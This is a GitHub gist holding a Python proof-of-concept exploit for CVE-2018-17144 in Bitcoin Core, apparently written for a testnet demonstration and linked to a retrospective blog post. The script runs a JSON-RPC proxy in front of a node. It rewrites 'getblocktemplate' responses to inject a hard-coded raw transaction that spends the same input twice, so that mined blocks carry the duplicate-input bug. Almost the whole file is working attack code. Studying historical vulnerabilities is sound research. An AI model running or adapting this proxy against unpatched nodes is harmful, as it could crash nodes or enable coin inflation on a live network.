Created
May 27, 2021 10:46
-
-
Save gdassori/988e1caf3ffaf2222b236fa3f3df6e75 to your computer and use it in GitHub Desktop.
Exploiting CVE 2018-17144 on Bitcoin Testnet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploiting CVE 2018-17144 on Bitcoin Testnet | |
# Guido Dassori, twitter.com/khs9ne | |
# https://bitcoindev.network/looking-back-on-exploiting-cve-2018-17144/ | |
import typing | |
import json | |
from http.server import BaseHTTPRequestHandler, HTTPServer | |
import requests | |
class JSONClient: | |
def __init__(self, host, port): | |
self.url = "http://{}:{}".format(host, port) | |
def call(self, method: str, params: typing.List=None, headers=None): | |
payload = { | |
"method": method, | |
"params": params, | |
"jsonrpc": "2.0", | |
"id": 1, | |
} | |
return requests.post(self.url, data=json.dumps(payload), headers=headers).json() | |
client = JSONClient('neuromante', '18332') | |
class JSONRPCServer(BaseHTTPRequestHandler): | |
def do_POST(self): | |
request = json.loads(self.rfile.read(int(self.headers['Content-Length'])).decode()) | |
result = { | |
"id": request.get("id"), | |
"result": None, | |
"error": None | |
} | |
headers = {'content-type': 'application/json', 'Authorization': self.headers['Authorization']} | |
print('Received Request %s' % request) | |
response = client.call(request['method'], request['params'], headers=headers) | |
print(request['method']) | |
print(type(request['method'])) | |
if request['method'] == 'getblocktemplate': | |
response['result']['transactions'] = [ | |
{ | |
"txid": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59", | |
"data": "0100000002d9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000008b4830" | |
"45022100e412610b2e2b8370f2eda0cf29fe19c2a4ea35191d8b42656e81bc97026b229e022046ff1df7293f" | |
"8dbc3efd95b125ebf679a4a68e8de2265990ef7553f1060dc9e301410455fd1c1a6cbfb25b5bba1cf6f850de" | |
"00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e0976b0" | |
"d9416880c8ffffffffd9bf9d812cfc91e3ff3b7f68e85269f64e7825de0fa61ff9dde117c73b72086a010000" | |
"008a47304402206fa6ef6c0727ecf8d40b2b4648a93b084396c9819d20a3300e83ac4d110589e8022060c78d" | |
"44db1d5b5babd1629c55d8058643d11a14da933b4bc5f7a8a2a7da377301410455fd1c1a6cbfb25b5bba1cf6" | |
"f850de00d79852be3de51e50c0da683613303c533d079e147dfe07ce4d40df2b776b35184698d14fa107a61e" | |
"0976b0d9416880c8ffffffff01e00f9700000000001976a914c8b876680fef08df5278a9df92df7e30b83cbb" | |
"7188ac00000000", | |
"hash": "fb7a8658ec015133e36e2cf7ddf7e8c887c3a5becec2f30f24ebfe43e72f4b59", | |
"depends": [], | |
"fee": 0.001 * 10 ** 8, | |
"sigops": 8, | |
"weight": 904 | |
} | |
] | |
result.update(response) | |
self.send_response(200) | |
self.send_header('Content-type', 'application/json') | |
self.end_headers() | |
self.wfile.write(json.dumps(response).encode()) | |
if __name__ == '__main__': | |
HTTPServer(('localhost', 18161), JSONRPCServer).serve_forever() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment